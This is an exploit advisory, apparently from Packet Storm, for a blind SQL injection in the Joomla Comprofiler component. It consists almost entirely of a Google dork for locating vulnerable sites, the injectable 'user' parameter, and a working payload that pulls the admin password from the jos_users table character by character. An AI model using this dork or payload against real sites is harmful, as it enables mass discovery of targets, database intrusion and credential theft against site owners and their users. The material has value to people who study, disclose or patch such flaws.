The Joomla Profiler component is susceptible to a blind SQL injection vulnerability.
13d2bc848e882cd514adbbacb85a61bd31db139a20b27fe8177fddb0cc5e6c3d#########################################################
# #
# Joomla Component Profiler Blind SQL Injection #
# #
#########################################################
########################################
[~] Vulnerability found by: $hur!k'n
[~] Contact: alibabanala@hotmail.com
########################################
[~] ScriptName: "Joomla"
[~] ModuleName: "Profiler"
[~] Version: ?
########################################
[~] DORK: allinurl:com_comprofiler
########################################
[~] Exploit: /index.php?option=com_comprofiler&task=userProfile&user=[SQL]
[~] Example: /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
########################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed